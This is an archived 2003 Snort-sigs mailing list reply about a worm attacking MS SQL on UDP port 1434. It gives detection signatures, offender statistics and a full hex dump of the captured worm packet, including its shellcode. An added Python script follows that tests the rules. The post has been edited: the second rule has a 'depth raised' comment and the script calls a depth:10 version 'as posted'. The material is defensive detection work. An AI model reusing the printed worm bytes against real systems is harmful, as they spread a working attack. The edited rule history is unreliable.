[Snort-sigs] Re: SQL BO attacks

Stephane Nasdrovisky stephane.nasdrovisky at ...345...
Mon Jan 27 12:38:13 EST 2003


As you guessed, it looks like a worm. Some packets come from non-routable
(10.*, ...) network addresses, which, in my eyes, tells me it's a worm and not an
intruder. Here are my .02 euro snort signatures for this new worm. It started on
25 Jan at 6:29:38 GMT+1.

alert udp any any -> any 1434 (msg:"mssql-030125-1"; content:"dllhel32hkern"; offset:150; depth:100;)
# depth raised from 10 to 13: the depth window must cover the full 13-byte content, otherwise the rule can never match
alert udp any any -> any 1434 (msg:"mssql-030125-2"; content:"|01 01 01 01 01 01 01 01 01 01 01 01 01|"; offset:44; depth:13;)

These signatures should alert on slightly different exploits and eventually some
legitimate traffic.

My first offenders:

My top 11 class A networks (because my addresses are in the 11th offenders):
packets  first octet
   1408  216
   1210  66
   1131  212
   1075  211
   1053  64
   1023  128
   1013  207
    930  210
    913  209
    774  213
    759  195

My top 10 class C networks:
packets  network
    205  207.46.200
    176  213.160.64
    136  134.79.16
    125  207.201.209
    109  216.237.145
    103  64.70.191
     94  212.141.84
     94  202.125.128
     92  207.229.137
     90  129.125.140

24590 packets reached our firewall between 6:29:38 and 10:55:35. (About 1% did
not reach the firewall, but who cares.)

Here is a packet dump from which I created my snort signature:
           0: 0003 ba0b e48d 0050 7343 a257 0800 4500    .......PsC.W..E.
          16: 0194 00f2 0000 6d11 d101 da39 813a c331    ......m....9.:.1
          32: 42d1 10c8 059a 0180 aa1d 0401 0101 0101    B...............
          48: 0101 0101 0101 0101 0101 0101 0101 0101    ................
          64: 0101 0101 0101 0101 0101 0101 0101 0101    ................
          80: 0101 0101 0101 0101 0101 0101 0101 0101    ................
          96: 0101 0101 0101 0101 0101 0101 0101 0101    ................
         112: 0101 0101 0101 0101 0101 0101 0101 0101    ................
         128: 0101 0101 0101 0101 0101 01dc c9b0 42eb    ..............B.
         144: 0e01 0101 0101 0101 70ae 4201 70ae 4290    ........p.B.p.B.
         160: 9090 9090 9090 9068 dcc9 b042 b801 0101    .......h...B....
         176: 0131 c9b1 1850 e2fd 3501 0101 0550 89e5    .1...P.ý5....P..
         192: 5168 2e64 6c6c 6865 6c33 3268 6b65 726e    Qh.dllhel32hkern
         208: 5168 6f75 6e74 6869 636b 4368 4765 7454    QhounthickChGetT
         224: 66b9 6c6c 5168 3332 2e64 6877 7332 5f66    f.llQh32.dhws2_f
         240: b965 7451 6873 6f63 6b66 b974 6f51 6873    .etQhsockf.toQhs
         256: 656e 64be 1810 ae42 8d45 d450 ff16 508d    end....B.E.P..P.
         272: 45e0 508d 45f0 50ff 1650 be10 10ae 428b    E.P.E.P..P....B.
         288: 1e8b 033d 558b ec51 7405 be1c 10ae 42ff    ...=U..Qt.....B.
         304: 16ff d031 c951 5150 81f1 0301 049b 81f1    ...1.QQP........
         320: 0101 0101 518d 45cc 508b 45c0 50ff 166a    ....Q.E.P.E.P..j
         336: 116a 026a 02ff d050 8d45 c450 8b45 c050    .j.j...P.E.P.E.P
         352: ff16 89c6 09db 81f3 3c61 d9ff 8b45 b48d    ........<a...E..
         368: 0c40 8d14 88c1 e204 01c2 c1e2 0829 c28d    .@...........)..
         384: 0490 01d8 8945 b46a 108d 45b0 5031 c951    .....E.j..E.P1.Q
         400: 6681 f178 0151 8d45 0350 8b45 ac50 ffd6    f..x.Q.E.P.E.P..
         416: ebca                                       ..


John Alexander wrote:

> All,
>
> I am with Fortrex Technologies and provide managed IDS.  We are seeing huge
> huge quantities of port 1434 traffic that started at 01:40 ET coming from all
> over the world and directed at all of our clients.  We are seeing the ISS
> RealSecure SQL_SSRP_BO attack in quantities like I haven't seen since Nimda
> first started up with its thing.  Originating from random source ports and
> directed at TCP/1434.
>
> You guys seeing anything?  I'm having to use an alternate address as I can't
> get into my work account.
>
> John Alexander
> Fortrex Technologies
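To check what Stephane's two signatures actually see, here is an added example (not code from the original post or from Snort itself) that re-implements Snort's content/offset/depth matching against a constructed UDP/1434 payload laid out like the capture above (0x04, a run of 0x01 bytes, "dllhel32hkern" at payload offset 153, no shellcode). It shows that the second rule, with depth:10 and a 13-byte content, can never fire, while depth:13 matches.

```python
from typing import Dict, Optional, Tuple

def parse_snort_content(s: str) -> bytes:
    """Turn a Snort content string into bytes; sections between | | are hex."""
    out = bytearray()
    for i, part in enumerate(s.split("|")):
        if i % 2 == 1:                       # odd parts sit inside |...|
            out += bytes.fromhex(part.replace(" ", ""))
        else:
            out += part.encode("latin-1")
    return bytes(out)

def content_match(payload: bytes, content: bytes, offset: int = 0,
                  depth: Optional[int] = None) -> bool:
    """Snort semantics: start at `offset` into the payload and inspect only
    `depth` bytes; the whole content has to fit inside that window."""
    end = len(payload) if depth is None else min(len(payload), offset + depth)
    return content in payload[offset:end]

def build_sample_payload() -> bytes:
    """CONSTRUCTED payload (not the captured worm): SSRP type byte 0x04,
    96 bytes of 0x01 as in the capture, zero padding, and the string the
    first rule keys on placed at payload offset 153 (packet offset 195)."""
    p = bytearray(b"\x04" + b"\x01" * 96)
    p += b"\x00" * (153 - len(p))
    p += b"dllhel32hkern"
    p += b"\x00" * 50
    return bytes(p)

# (content, offset, depth) taken from the rules in the post; the third entry
# is the same second rule with depth widened to cover its 13-byte content.
RULES: Dict[str, Tuple[str, int, int]] = {
    "mssql-030125-1": ("dllhel32hkern", 150, 100),
    "mssql-030125-2-as-posted": ("|01 01 01 01 01 01 01 01 01 01 01 01 01|", 44, 10),
    "mssql-030125-2-depth13": ("|01 01 01 01 01 01 01 01 01 01 01 01 01|", 44, 13),
}

def evaluate(payload: bytes) -> Dict[str, bool]:
    """Map each rule name to whether its content option matches `payload`."""
    return {name: content_match(payload, parse_snort_content(c), off, dep)
            for name, (c, off, dep) in RULES.items()}

if __name__ == "__main__":
    for name, hit in evaluate(build_sample_payload()).items():
        print(f"{name:28s} {'match' if hit else 'no match'}")
```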